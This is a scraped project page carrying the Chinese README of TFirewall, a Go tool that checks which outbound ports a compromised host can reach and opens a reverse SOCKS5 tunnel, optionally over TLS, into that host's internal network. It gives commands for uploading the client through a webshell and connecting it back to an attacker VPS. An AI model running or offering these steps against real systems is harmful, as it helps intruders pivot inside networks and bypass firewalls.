Git Product home page Git Product logo

tfirewall's Introduction

layout title category tags keywords
post
TFirewall
工具
firewall,Golang
firewall,Golang

TFirewall是测试已控主机哪些端口可以出网及建立内网socks5代理的工具.工具主体使用golang开发,工具包含客户端及服务端,适用于windows,linux,x64,x86.

使用方法

出网检测

  • server_linux_x64上传到VPS服务器(假设VPS的IP地址10.10.10.10)
  • 直接运行.\server_linux_x64 check启动监听,工具会自动监听常用的TOP10端口,或通过 .\server_linux_x64 check 20-23,53,80自定义监听端口
  • 服务端打印如下信息表示监听成功
root@taZ:~# ./server_linux_x64 check 20-23,53,80
Check Server listening:  [20 21 22 23 53 80]
  • 通过WEBShell管理工具将client_win_x86.exe上传到已控服务器
  • 运行client_win_x86.exe check 10.10.10.10测试TOP10端口哪些可以出网(服务端对应命令.\server_linux_x64 check)
  • 运行client_win_x86.exe check 10.10.10.10 20-23,53,80探测指定端口(服务端对应命令.\server_linux_x64 check 20-23,53,80)
  • 观察服务端输出即可查看客户端可以连接服务端哪些端口,使用什么协议
root@iZj6cbux9hc5eo9oyud2taZ:~# ./server_linux_x64 check 23,80-82
Check Server listening:  [23 80 81]
RecvTCP On 172.17.20.209:23 From 175.132.138.137:16918 
RecvTCP On 172.17.20.209:80 From 175.132.138.137:50641 
RecvTCP On 172.17.20.209:81 From 175.132.138.137:38747 
RecvUDP On [::]:23 From 175.167.138.137:28822
RecvUDP On [::]:80 From 175.167.138.137:26831
RecvUDP On [::]:81 From 175.167.138.137:26832

内网socks5代理

  • server_linux_x64上传到VPS服务器(假设VPS的IP地址10.10.10.10)
  • 通过 .\server_linux_x64 socks5 80 1080在80端口启动控制监听,1080启动内网socks5端口
  • 服务端打印如下信息表示监听成功
root@vultr:~# ./server_linux_x64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080
  • 通过WEBShell管理工具将client_win_x86.exe上传到已控服务器
  • 运行client_win_x64.exe socks5 10.10.10.10 80连接服务端
  • 使用10.10.10.10:1080作为内网是socks5代理(11.11.11.11是该内网出口路由器的IP地址)
root@vultr:~# ./server_linux_x64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080
Socks5 new socket from :  11.11.11.11:55943
Control new socket from :  11.11.11.11:55789

内网socks5代理(TLS加密)

  • server_linux_x64上传到VPS服务器(假设VPS的IP地址10.10.10.10)
  • 将server.pem(tls公钥),server.key(tls私钥)上传到server_linux_x64相同目录
  • 通过 .\server_linux_x64 socks5 80 1080 tls在80端口启动控制监听,1080启动内网socks5端口
  • 服务端打印如下信息表示监听成功
root@vultr:~# ./server_linux_x64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080
  • 通过WEBShell管理工具将client_win_x86.exe上传到已控服务器
  • 运行client_win_x64.exe socks5 10.10.10.10 80 tls连接服务端
  • 使用10.10.10.10:1080作为内网是socks5代理(11.11.11.11是该内网出口路由器的IP地址)
root@vultr:~# ./server_linux_x64 socks5 80 1080
Control Listening:  80
Socks5 Listening:  1080
Socks5 new socket from :  11.11.11.11:55943
Control new socket from :  11.11.11.11:55789

已测试

server

  • ubuntu 18

client

  • Windows 10
  • ubuntu 16
  • kali

tfirewall's People

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.